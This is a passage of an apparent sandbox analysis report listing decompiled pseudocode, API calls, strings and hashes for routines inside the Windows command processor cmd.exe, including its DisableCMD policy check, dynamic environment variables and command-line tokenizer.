									_t93 = 0;
									_t86 = _t97;
									_t96 = E011DEEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
								}
							}
							_push(0);
							_push(0x40002729);
							E011DC108(_t84);
							E011F3BB0(__eflags, 0);
							do {
								__eflags = E011E4B60(__eflags, 0);
							} while (__eflags == 0);
							_push(_t96);
							goto L13;
						}
						__eflags = _t44 - _t97;
						if(__eflags != 0) {
							goto L33;
						} else {
							goto L31;
						}
						do {
							L31:
							__eflags = E011E4B60(__eflags, 0);
						} while (__eflags == 0);
						goto L25;
					}
					_push(0);
					_push(0x120b8b8);
					L011E82C1();
					_t82 =  *0x1213ccc;
					if(_t44 != 0) {
						_t44 = 1;
						_v44 = 1;
						__eflags = _t82;
						if(__eflags != 0) {
							_v28 = 0xff;
						}
					} else {
						_t44 = _v44;
					}
					if(_t44 != 0) {
						goto L10;
					} else {
						_t97 = 0;
						goto L7;
					}
				}
			}





























                                    0x011e4504
                                    0x011e450b
                                    0x011e4513
                                    0x011e4529
                                    0x011e452e
                                    0x011e4538
                                    0x011e4541
                                    0x011e455d
                                    0x011ee6ee
                                    0x011ee707
                                    0x011ee710
                                    0x011ee710
                                    0x011e4566
                                    0x011e456d
                                    0x011e4572
                                    0x011e4577
                                    0x011e457f
                                    0x011e4581
                                    0x011e4587
                                    0x011e458e
                                    0x011e4591
                                    0x011e4594
                                    0x011e4598
                                    0x011e4599
                                    0x011e459a
                                    0x011e459b
                                    0x011e45a4
                                    0x011ee71b
                                    0x011ee71c
                                    0x011ee721
                                    0x011ee729
                                    0x011ee72e
                                    0x011ee734
                                    0x011ee734
                                    0x011ee738
                                    0x00000000
                                    0x011e45aa
                                    0x011e45aa
                                    0x011e45b1
                                    0x011ee77f
                                    0x011ee77f
                                    0x011ee785
                                    0x011ee78a
                                    0x011ee78e
                                    0x011ee791
                                    0x011ee792
                                    0x011ee794
                                    0x011ee7a6
                                    0x011ee7a6
                                    0x011ee7a9
                                    0x011ee7d0
                                    0x011ee7d5
                                    0x011ee7d7
                                    0x011ee7db
                                    0x011ee7e2
                                    0x011ee7e9
                                    0x011ee7e9
                                    0x011ee7eb
                                    0x011ee7f0
                                    0x011ee7f0
                                    0x011ee7f6
                                    0x011ee7fc
                                    0x011ee808
                                    0x011ee80e
                                    0x011ee815
                                    0x011ee817
                                    0x011ee81e
                                    0x011ee820
                                    0x011ee823
                                    0x00000000
                                    0x00000000
                                    0x011ee825
                                    0x011ee825
                                    0x011ee828
                                    0x011ee899
                                    0x011ee89f
                                    0x011ee89f
                                    0x011ee762
                                    0x011ee762
                                    0x011e4625
                                    0x011e4625
                                    0x011e462b
                                    0x011e4634
                                    0x011e463c
                                    0x011ee768
                                    0x011ee76e
                                    0x011ee76e
                                    0x011ee772
                                    0x00000000
                                    0x011ee772
                                    0x011e4645
                                    0x011ee758
                                    0x011ee75e
                                    0x011ee75e
                                    0x00000000
                                    0x011ee758
                                    0x011e464b
                                    0x011e464f
                                    0x011e4656
                                    0x011e4658
                                    0x011e4658
                                    0x011e45e3
                                    0x011e45e3
                                    0x011e45e7
                                    0x011e45db
                                    0x011e45db
                                    0x011e45e1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e45e1
                                    0x011e45e9
                                    0x011e45ee
                                    0x011e45fa
                                    0x011e45ff
                                    0x011e4605
                                    0x011e460a
                                    0x011e4610
                                    0x011e4610
                                    0x011e4612
                                    0x011ee779
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e4618
                                    0x011e4618
                                    0x011e461e
                                    0x011e4622
                                    0x00000000
                                    0x011e4622
                                    0x011ee830
                                    0x011ee83c
                                    0x011ee842
                                    0x011ee848
                                    0x011ee854
                                    0x011ee859
                                    0x011ee85f
                                    0x011ee868
                                    0x011ee86d
                                    0x011ee873
                                    0x011ee878
                                    0x011ee884
                                    0x011ee889
                                    0x011ee88f
                                    0x011ee7f0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee7f0
                                    0x011ee7f6
                                    0x011ee7fc
                                    0x011ee808
                                    0x011ee80e
                                    0x011ee815
                                    0x011ee817
                                    0x011ee81e
                                    0x011ee820
                                    0x011ee820
                                    0x011ee7f0
                                    0x011ee7ab
                                    0x011ee7ac
                                    0x011ee7b1
                                    0x011ee7b9
                                    0x011ee7be
                                    0x011ee7c4
                                    0x011ee7c4
                                    0x011ee7c8
                                    0x00000000
                                    0x011ee7c8
                                    0x011ee796
                                    0x011ee798
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee79a
                                    0x011ee79a
                                    0x011ee7a0
                                    0x011ee7a0
                                    0x00000000
                                    0x011ee7a4
                                    0x011e45b7
                                    0x011e45b8
                                    0x011e45bd
                                    0x011e45c4
                                    0x011e45cc
                                    0x011ee744
                                    0x011ee745
                                    0x011ee748
                                    0x011ee74a
                                    0x011ee750
                                    0x011ee750
                                    0x011e45d2
                                    0x011e45d2
                                    0x011e45d2
                                    0x011e45d7
                                    0x00000000
                                    0x011e45d9
                                    0x011e45d9
                                    0x00000000
                                    0x011e45d9
                                    0x011e45d7

                                    APIs
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E4516
                                    • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 011E4523
                                      • Part of subcall function 011E465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                      • Part of subcall function 011E465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                    • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 011E4538
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 011E4555
                                    • _setjmp3.MSVCRT ref: 011E45BD
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 011E45EE
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E45FF
                                    • exit.MSVCRT ref: 011E4625
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 011EE707
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011EE710
                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E4770
                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E478C
                                      • Part of subcall function 011E46D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                      • Part of subcall function 011E46D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                      • Part of subcall function 011E46D8: memset.MSVCRT ref: 011E4703
                                      • Part of subcall function 011E3D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                      • Part of subcall function 011E3D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                      • Part of subcall function 011E3D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                      • Part of subcall function 011E3D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D85
                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D99
                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                    • _setjmp3.MSVCRT ref: 011EE785
                                    Strings
                                    • DisableCMD, xrefs: 011EE6FF
                                    • Software\Policies\Microsoft\Windows\System, xrefs: 011E454B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                    • API String ID: 4268540630-1920437939
                                    • Opcode ID: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                    • Instruction ID: 11d40929f194e6a4fe30daf578201b1c5c5b5d6784bd68168e57703f76d61b55
                                    • Opcode Fuzzy Hash: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                    • Instruction Fuzzy Hash: C171D571E41A0AEEEF3DEBF5BC9CA7E3BE9EB18218B140429E501D2185DF70C4408B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DCFBC, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 141COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • _wcsicmp.MSVCRT ref: 011DD005
                                    • _wcsicmp.MSVCRT ref: 011DD01B
                                    • _wcsicmp.MSVCRT ref: 011DD031
                                    • _wcsicmp.MSVCRT ref: 011DD047
                                    • _wcsicmp.MSVCRT ref: 011DD05D
                                    • _wcsicmp.MSVCRT ref: 011DD073
                                    • _wcsicmp.MSVCRT ref: 011DD085
                                    • _wcsicmp.MSVCRT ref: 011DD09B
                                      • Part of subcall function 011D96A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                      • Part of subcall function 011D96A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                      • Part of subcall function 011D96A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                      • Part of subcall function 011D96A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                    • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                    • API String ID: 2447294730-2301591722
                                    • Opcode ID: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                    • Instruction ID: 5a0ed5444746943e53c27e84cdc6754e49d4beb7520d823db971327570d2ce85
                                    • Opcode Fuzzy Hash: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                    • Instruction Fuzzy Hash: 1F311832608602ABFF3CA77ABC1DFAB26DDDB95564B14441EF512D11C4EF319002C766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DF300, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 441COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 96%
                                    			E011DF300(signed int __eax, signed short* __ecx, intOrPtr __edx, signed int _a4) {
				signed short* _v8;
				intOrPtr _v12;
				signed short* _v16;
				long _v20;
				signed int _t92;
				signed int _t102;
				signed int _t109;
				signed char _t110;
				int _t111;
				wchar_t* _t112;
				wchar_t* _t113;
				int _t114;
				signed int _t120;
				long _t121;
				int _t122;
				wchar_t* _t123;
				signed int _t129;
				int _t130;
				signed int _t135;
				int _t136;
				signed int _t139;
				signed short* _t141;
				int _t148;
				long _t152;
				int _t153;
				int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				int _t164;
				wchar_t* _t165;
				wchar_t* _t166;
				signed short* _t167;
				signed int _t169;
				signed int _t173;
				long* _t174;
				long* _t180;
				long* _t181;
				intOrPtr _t182;
				long* _t183;
				long _t184;
				long _t185;
				long _t186;
				long _t187;
				void* _t188;
				void* _t189;
				void* _t192;

				_t175 = __ecx;
				_t92 = __eax;
				_push(0);
				_push(0x120b8f8);
				_v12 = __edx;
				_v8 = __ecx;
				L011E82C1();
				_t189 = _t188 + 8;
				if(__eax != 0) {
					L139:
					return _t92 | 0xffffffff;
				}
				_t180 = _v8;
				if(_t180 == 0) {
					if( *0x120f984 != 0) {
						_push( *0x120b8a0);
						E011E25D9(L"Ungetting: \'%s\'\n");
					}
					 *0x120b8a4 =  *0x120b8a0;
					return 0;
				} else {
					if(_v12 < 6) {
						goto L139;
					}
					_t169 = _a4;
					 *0x120b8a0 =  *0x120b8a4;
					_v16 = _t180;
					if((_t169 & 0x00000021) == 0) {
						while(1) {
							_t187 = E011DF9D5(_t175) & 0x0000ffff;
							_t164 = iswspace(_t187);
							_t189 = _t189 + 4;
							if(_t164 != 0 && _t187 != 0xa) {
								goto L6;
							} else {
								continue;
							}
							do {
								_t187 = E011DF9D5(_t175) & 0x0000ffff;
								_t164 = iswspace(_t187);
								_t189 = _t189 + 4;
							} while (_t164 != 0 && _t187 != 0xa);
							L6:
							if((_t169 & 0x00000004) != 0) {
								_t165 = 0x11d2102;
							} else {
								_t165 = L"=,;";
							}
							_t166 = wcschr(_t165, _t187);
							_t189 = _t189 + 8;
							if(_t166 != 0) {
								if(_t187 == 0) {
									goto L9;
								} else {
									continue;
								}
							}
							L9:
							_t167 =  *0x120b8a4;
							if(_t167 != 0x1203890) {
								 *0x120b8a4 = _t167 - 2;
							}
							goto L11;
						}
					}
					L11:
					_t184 = E011DF9D5(_t175) & 0x0000ffff;
					if( *0x11fd5b4 != 0) {
						 *0x11fd5b4 = 0;
						if((_t169 & 0x00000040) != 0) {
							goto L41;
						} else {
							_t184 = E011DF9D5(_t175) & 0x0000ffff;
							goto L12;
						}
						goto L140;
					} else {
						L12:
						_t129 = _t184 & 0x0000ffff;
						if(_t129 != 0xa) {
							if(_t129 >= 0x41) {
								if(_t129 >= 0x7c) {
									goto L25;
								} else {
									goto L33;
								}
							} else {
								L25:
								if(_t129 > 0x7c) {
									goto L33;
								} else {
									_t16 = _t129 + 0x11df8c0; // 0x5050500
									switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M011DF8A8))) {
										case 0:
											goto L13;
										case 1:
											goto L14;
										case 2:
											L27:
											if((_t169 & 0x0000002a) == 8) {
												goto L28;
											}
											goto L33;
										case 3:
											L28:
											if((_t169 & 0x00000022) == 0) {
												if((_t169 & 0x00000010) != 0 || _t184 != 0x29) {
													goto L13;
												} else {
												}
											}
											goto L33;
										case 4:
											if((__bl & 0x00000022) != 0) {
												goto L33;
											} else {
												if( *0x11fd548 != 0) {
													goto L27;
												} else {
													goto L41;
												}
											}
											goto L140;
										case 5:
											goto L33;
									}
								}
							}
						} else {
							L13:
							_t169 = _t169 & 0xffffffdd;
							_a4 = _t169;
							L14:
							if((_t169 & 0x00000022) == 0) {
								L15:
								 *_t180 = _t184;
								_t183 =  &(_t180[0]);
								_v8 = _t183;
								_t174 = _t183;
								_t136 = iswdigit(_t184);
								_t192 = _t189 + 4;
								if(_t136 != 0) {
									_t184 = E011DF9D5(_t175) & 0x0000ffff;
									_t174 =  &(_t183[0]);
									 *_t183 = _t184;
									_t183 = _t174;
									_v8 = _t183;
								}
								if(_t184 == 0x3e || _t184 == 0x26 || _t184 == 0x7c || _t184 == 0x3c) {
									_t139 = E011DF9D5(_t175) & 0x0000ffff;
									if(_t139 ==  *(_t183 - 2)) {
										 *_t183 = _t139;
										_t183 =  &(_t174[0]);
										_v8 = _t183;
										_t139 = E011DF9D5(_t175) & 0x0000ffff;
										_t174 = _t183;
									}
									_t176 =  *(_t183 - 2) & 0x0000ffff;
									if(_t176 != 0x3e) {
										if(_t176 != 0x3c) {
											goto L79;
										}
										goto L78;
									} else {
										L78:
										if(_t139 == 0x26) {
											 *_t183 = 0x26;
											_t183 =  &(_t174[0]);
											_v8 = _t183;
											goto L109;
											do {
												do {
													L109:
													_t186 = E011DF9D5(_t176) & 0x0000ffff;
													_t148 = iswspace(_t186);
													_t192 = _t192 + 4;
												} while (_t148 != 0);
												_t176 = L"=,;";
											} while (E011DD7D4(L"=,;", _t186) != 0);
											if(iswdigit(_t186) != 0) {
												 *_t183 = _t186;
												_t183 =  &(_t183[0]);
												_v8 = _t183;
												E011DF9D5(_t176);
											}
										}
										L79:
										_t141 =  *0x120b8a4;
										if(_t141 != 0x1203890) {
											 *0x120b8a4 = _t141 - 2;
										}
										goto L20;
									}
								} else {
									L20:
									 *_t183 = 0;
									return  *_v16 & 0x0000ffff;
								}
							}
							L33:
							if(_t184 == 0x5e) {
								if((_t169 & 0x00000022) != 0) {
									goto L34;
								} else {
									_t184 = E011DF9D5(_t175) & 0x0000ffff;
									if(_t184 == 0) {
										goto L15;
									}
									if(_t184 != 0xa) {
										goto L41;
									} else {
										_t184 = E011DF9D5(_t175) & 0x0000ffff;
										if(_t184 != 0) {
											goto L41;
										} else {
											goto L15;
										}
									}
								}
								goto L140;
							} else {
								L34:
								if(_t184 == 0x22) {
									_t169 = _t169 ^ 0x00000002;
									_a4 = _t169;
								}
								if((_t169 & 0x00000023) == 0) {
									_t155 = iswspace(_t184);
									_t189 = _t189 + 4;
									if(_t155 != 0) {
										goto L15;
									}
									if((_t169 & 0x00000004) != 0) {
										_t156 = 0x11d2102;
									} else {
										_t156 = L"=,;";
									}
									_t157 = wcschr(_t156, _t184);
									_t189 = _t189 + 8;
									if(_t157 != 0) {
										goto L15;
									}
								}
								_t130 = iswdigit(_t184);
								_t189 = _t189 + 4;
								if(_t130 != 0) {
									_t175 =  *0x120b8a4;
									if((_t175 - 0x120388e & 0xfffffffe) < 4) {
										L88:
										_t135 =  *_t175 & 0x0000ffff;
										if(_t135 != 0x3e) {
											if(_t135 != 0x3c) {
												goto L41;
											} else {
												goto L89;
											}
										} else {
											L89:
											if((_t169 & 0x00000022) == 0) {
												goto L15;
											}
											goto L41;
										}
									} else {
										_t152 =  *(_t175 - 4) & 0x0000ffff;
										_v20 = _t152;
										_t153 = iswspace(_t152);
										_t189 = _t189 + 4;
										if(_t153 == 0) {
											_t175 = L"()|&=,;\"";
											if(E011DD7D4(L"()|&=,;\"", _v20) == 0) {
												goto L41;
											} else {
												goto L87;
											}
										} else {
											L87:
											_t175 =  *0x120b8a4;
											goto L88;
										}
									}
									goto L140;
								}
							}
						}
					}
					L41:
					 *_t180 = _t184;
					_t181 =  &(_t180[0]);
					_a4 = _t169 | 0x00000040;
					 *0x11fd548 = 0;
					_t173 = _t181 - _v16 >> 1;
					while(1) {
						_v8 = _t181;
						_t185 = E011DF9D5(_t175) & 0x0000ffff;
						if( *0x11fd5b4 != 0) {
							goto L131;
						}
						L43:
						_t109 = _t185 & 0x0000ffff;
						if(_t109 < 0x41 || _t109 >= 0x7c) {
							if(_t109 > 0x7c) {
								goto L45;
							} else {
								_t34 = _t109 + 0x11df958; // 0x5050500
								switch( *((intOrPtr*)(( *_t34 & 0x000000ff) * 4 +  &M011DF940))) {
									case 0:
										_t127 = _a4;
										goto L54;
									case 1:
										__eax = _a4;
										goto L55;
									case 2:
										__eax = _a4;
										goto L114;
									case 3:
										L101:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if((__al & 0x00000010) != 0) {
												L54:
												_t102 = _t127 & 0xffffffdd;
												_a4 = _t102;
												L55:
												if((_t102 & 0x00000022) != 0) {
													goto L45;
												}
												goto L62;
											} else {
												if(__si == 0x29) {
													goto L45;
												} else {
													goto L54;
												}
											}
										}
										goto L140;
									case 4:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if( *0x11fd548 == 0) {
												goto L49;
											} else {
												L114:
												__al = __al & 0x0000002a;
												if(__al != 8) {
													goto L45;
												} else {
													goto L101;
												}
											}
										}
										goto L140;
									case 5:
										goto L45;
								}
							}
						} else {
							L45:
							_t110 = _a4;
							if(_t185 == 0x5e) {
								if((_t110 & 0x00000022) != 0) {
									goto L46;
								} else {
									_t185 = E011DF9D5(_t175) & 0x0000ffff;
									if(_t185 == 0) {
										goto L61;
									} else {
										if(_t185 != 0xa) {
											goto L49;
										} else {
											_t185 = E011DF9D5(_t175) & 0x0000ffff;
											if(_t185 == 0) {
												goto L61;
											} else {
												goto L49;
											}
										}
									}
								}
								goto L140;
							} else {
								L46:
								if(_t185 == 0x22) {
									_t110 = _t110 ^ 0x00000002;
									_a4 = _t110;
								}
								if((_t110 & 0x00000023) == 0) {
									_t111 = iswspace(_t185);
									_t189 = _t189 + 4;
									if(_t111 != 0) {
										goto L61;
									} else {
										if((_a4 & 0x00000004) != 0) {
											_t112 = 0x11d2102;
										} else {
											_t112 = L"=,;";
										}
										_t113 = wcschr(_t112, _t185);
										_t189 = _t189 + 8;
										if(_t113 == 0) {
											goto L48;
										} else {
											goto L61;
										}
									}
								} else {
									L48:
									_t114 = iswdigit(_t185);
									_t189 = _t189 + 4;
									if(_t114 != 0) {
										_t175 =  *0x120b8a4;
										if((_t175 - 0x120388e & 0xfffffffe) < 4) {
											L70:
											_t120 =  *( *0x120b8a4) & 0x0000ffff;
											if(_t120 == 0x3e || _t120 == 0x3c) {
												_t102 = _a4;
												if((_t102 & 0x00000022) == 0) {
													goto L62;
												} else {
													goto L49;
												}
											} else {
												goto L49;
											}
										} else {
											_t121 =  *(_t175 - 4) & 0x0000ffff;
											_v20 = _t121;
											_t122 = iswspace(_t121);
											_t189 = _t189 + 4;
											if(_t122 != 0) {
												goto L70;
											} else {
												_t123 = wcschr(L"()|&=,;\"", _v20);
												_t189 = _t189 + 8;
												if(_t123 == 0) {
													goto L49;
												} else {
													goto L70;
												}
											}
										}
										goto L140;
									} else {
										L49:
										if(_t173 >= _v12 - 1) {
											L61:
											_t102 = _a4;
										} else {
											 *_t181 = _t185;
											_t181 =  &(_t181[0]);
											_t173 = _t173 + 1;
											continue;
										}
									}
								}
							}
						}
						L62:
						_a4 = _t102 & 0xffffffbf;
						 *_t181 = 0;
						_t182 = _v12;
						_t47 = _t182 - 1; // 0x3
						if(_t173 < _t47) {
							_t175 =  *0x120b8a4;
							if( *0x120b8a4 != 0x1203890) {
								 *0x120b8a4 =  *0x120b8a4 - 2;
							}
						}
						if(_t173 >= _t182) {
							if(_t185 != 0xffff) {
								_t92 = E011DC5A2(_t175, 0x234f, 1, _v16);
								goto L139;
							}
						}
						return 0x4000;
						goto L140;
						L131:
						 *0x11fd5b4 = 0;
						if((_a4 & 0x00000040) != 0) {
							goto L49;
						} else {
							_t185 = E011DF9D5(_t175) & 0x0000ffff;
							goto L43;
						}
						goto L140;
					}
				}
				goto L140;
			}

















































                                    0x011df300
                                    0x011df300
                                    0x011df30b
                                    0x011df30d
                                    0x011df312
                                    0x011df315
                                    0x011df318
                                    0x011df31d
                                    0x011df322
                                    0x011ec593
                                    0x00000000
                                    0x011ec593
                                    0x011df328
                                    0x011df32d
                                    0x011df432
                                    0x011ec4dc
                                    0x011ec4e7
                                    0x011ec4ec
                                    0x011df43d
                                    0x011df44a
                                    0x011df333
                                    0x011df337
                                    0x00000000
                                    0x00000000
                                    0x011df33d
                                    0x011df345
                                    0x011df34a
                                    0x011df350
                                    0x011df352
                                    0x011df357
                                    0x011df35b
                                    0x011df361
                                    0x011df366
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df352
                                    0x011df357
                                    0x011df35b
                                    0x011df361
                                    0x011df364
                                    0x011df36d
                                    0x011df370
                                    0x011df744
                                    0x011df376
                                    0x011df376
                                    0x011df376
                                    0x011df37d
                                    0x011df383
                                    0x011df388
                                    0x011df6de
                                    0x00000000
                                    0x011df6e4
                                    0x00000000
                                    0x011df6e4
                                    0x011df6de
                                    0x011df38e
                                    0x011df38e
                                    0x011df398
                                    0x011df39d
                                    0x011df39d
                                    0x00000000
                                    0x011df398
                                    0x011df352
                                    0x011df3a2
                                    0x011df3ae
                                    0x011df3b1
                                    0x011ec4f4
                                    0x011ec501
                                    0x00000000
                                    0x011ec507
                                    0x011ec50c
                                    0x00000000
                                    0x011ec50c
                                    0x00000000
                                    0x011df3b7
                                    0x011df3b7
                                    0x011df3b7
                                    0x011df3bd
                                    0x011df450
                                    0x011df48a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df452
                                    0x011df452
                                    0x011df455
                                    0x00000000
                                    0x011df457
                                    0x011df457
                                    0x011df45e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df465
                                    0x011df46b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df46d
                                    0x011df470
                                    0x011df475
                                    0x00000000
                                    0x00000000
                                    0x011df485
                                    0x011df475
                                    0x00000000
                                    0x00000000
                                    0x011df7bb
                                    0x00000000
                                    0x011df7c1
                                    0x011df7c8
                                    0x00000000
                                    0x011df7ce
                                    0x00000000
                                    0x011df7ce
                                    0x011df7c8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df45e
                                    0x011df455
                                    0x011df3c3
                                    0x011df3c3
                                    0x011df3c3
                                    0x011df3c6
                                    0x011df3c9
                                    0x011df3cc
                                    0x011df3d2
                                    0x011df3d2
                                    0x011df3d5
                                    0x011df3d9
                                    0x011df3dc
                                    0x011df3de
                                    0x011df3e4
                                    0x011df3e9
                                    0x011df76d
                                    0x011df770
                                    0x011df773
                                    0x011df776
                                    0x011df778
                                    0x011df778
                                    0x011df3f3
                                    0x011df681
                                    0x011df688
                                    0x011df6c6
                                    0x011df6c9
                                    0x011df6cc
                                    0x011df6d4
                                    0x011df6d7
                                    0x011df6d7
                                    0x011df68a
                                    0x011df691
                                    0x011df739
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df697
                                    0x011df697
                                    0x011df69b
                                    0x011df7d8
                                    0x011df7db
                                    0x011df7de
                                    0x011df7de
                                    0x011df7e1
                                    0x011df7e1
                                    0x011df7e1
                                    0x011df7e6
                                    0x011df7ea
                                    0x011df7f0
                                    0x011df7f3
                                    0x011df7f9
                                    0x011df803
                                    0x011df813
                                    0x011df819
                                    0x011df81c
                                    0x011df81f
                                    0x011df822
                                    0x011df822
                                    0x011df813
                                    0x011df6a1
                                    0x011df6a1
                                    0x011df6ab
                                    0x011df6b4
                                    0x011df6b4
                                    0x00000000
                                    0x011df6ab
                                    0x011df417
                                    0x011df417
                                    0x011df419
                                    0x00000000
                                    0x011df41f
                                    0x011df3f3
                                    0x011df48c
                                    0x011df490
                                    0x011df868
                                    0x00000000
                                    0x011df86e
                                    0x011df873
                                    0x011df879
                                    0x00000000
                                    0x00000000
                                    0x011df882
                                    0x00000000
                                    0x011df888
                                    0x011ec519
                                    0x011ec51f
                                    0x00000000
                                    0x011ec525
                                    0x00000000
                                    0x011ec525
                                    0x011ec51f
                                    0x011df882
                                    0x00000000
                                    0x011df496
                                    0x011df496
                                    0x011df49a
                                    0x011df780
                                    0x011df783
                                    0x011df783
                                    0x011df4a3
                                    0x011df4a6
                                    0x011df4ac
                                    0x011df4b1
                                    0x00000000
                                    0x00000000
                                    0x011df4ba
                                    0x011df74e
                                    0x011df4c0
                                    0x011df4c0
                                    0x011df4c0
                                    0x011df4c7
                                    0x011df4cd
                                    0x011df4d2
                                    0x00000000
                                    0x00000000
                                    0x011df4d2
                                    0x011df4d9
                                    0x011df4df
                                    0x011df4e4
                                    0x011df6e9
                                    0x011df6ff
                                    0x011df720
                                    0x011df720
                                    0x011df726
                                    0x011df78e
                                    0x00000000
                                    0x011df794
                                    0x00000000
                                    0x011df794
                                    0x011df728
                                    0x011df728
                                    0x011df72b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df731
                                    0x011df701
                                    0x011df701
                                    0x011df706
                                    0x011df709
                                    0x011df70f
                                    0x011df714
                                    0x011df890
                                    0x011df89c
                                    0x00000000
                                    0x011df8a2
                                    0x00000000
                                    0x011df8a2
                                    0x011df71a
                                    0x011df71a
